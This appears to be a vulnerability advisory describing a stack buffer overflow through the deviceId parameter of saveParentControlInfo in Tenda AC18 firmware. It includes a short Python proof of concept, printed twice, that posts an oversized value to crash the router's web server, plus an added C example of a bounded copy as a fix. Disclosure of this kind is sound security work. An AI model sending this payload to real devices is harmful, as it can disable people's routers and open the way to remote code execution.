Tenda AC18 V15.03.3.10_EN
Tenda AC18 V15.03.3.10_EN has a buffer overflow vulnerability in the `saveParentControlInfo` function. The `src` variable receives the `deviceId` parameter from a POST request. Because there is no size check, a user-provided `deviceId` can cause a buffer overflow when it is passed to the `strcpy` function. An attacker can easily perform a denial-of-service attack or remote code execution with carefully crafted overflow data.
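The missing size check described above, shown beside a bounded replacement. This is an added example, not code from the firmware or from the original report; `DEVICE_ID_MAX`, `copy_device_id` and `handle_save_parent_control` are hypothetical names, and the buffer size is an assumption because the page does not state it.

```c
#include <stdio.h>
#include <string.h>

/* Assumed capacity: the page does not state the real size of the buffer. */
#define DEVICE_ID_MAX 32

enum copy_status { COPY_OK = 0, COPY_MISSING = -1, COPY_TOO_LONG = -2 };

/* Pattern the advisory describes, kept as a comment for contrast:
 *     char src[DEVICE_ID_MAX];
 *     strcpy(src, device_id);   // copies until NUL, ignoring sizeof src
 */

/* Bounded copy: scan at most dst_size bytes of input, reject anything that
 * does not fit (terminator included), and copy only after that check.
 * Oversized input is rejected rather than truncated. */
enum copy_status copy_device_id(char *dst, size_t dst_size, const char *device_id)
{
    size_t len = 0;
    if (dst == NULL || dst_size == 0)
        return COPY_MISSING;
    dst[0] = '\0';
    if (device_id == NULL || device_id[0] == '\0')
        return COPY_MISSING;
    while (len < dst_size && device_id[len] != '\0')
        len++;
    if (len >= dst_size)
        return COPY_TOO_LONG;
    memcpy(dst, device_id, len + 1);   /* len + 1 <= dst_size */
    return COPY_OK;
}

/* Hypothetical handler wrapper: returns an HTTP-style status code. */
int handle_save_parent_control(const char *device_id_param)
{
    char src[DEVICE_ID_MAX];
    if (copy_device_id(src, sizeof src, device_id_param) != COPY_OK)
        return 400;                    /* reject before any further parsing */
    return 200;
}

int main(void)
{
    char big[1000];                    /* constructed input: 999 bytes of 'a' */
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("short id  -> %d\n", handle_save_parent_control("aa:bb:cc:dd:ee:ff"));
    printf("999 bytes -> %d\n", handle_save_parent_control(big));
    return 0;
}
```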
```python
# saveParentControlInfo_1
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/saveParentControlInfo"
data = {"deviceId":"a"*999}
ret = requests.post(url, data)
```
###Product_version
Tenda AC18
V15.03.3.10_EN
###Affected_component
the "saveParentControlInfo" function of /bin/httpd; /bin/httpd
###Attack_vector
A simple PoC is enough to trigger it, like this:
```python
# python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/saveParentControlInfo"
data = {"deviceId":"a"*999}
ret = requests.post(url, data)
```
###Description
Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo.
###Reference
<https://palm-vertebra-fe9.notion.site/saveParentControlInfo_1-7c9695d0251945ae8006db705b9b80ac>
<https://www.tendacn.com/hk/download/detail-3863.html>
<https://www.tendacn.com/hk/download/detail-3852.html>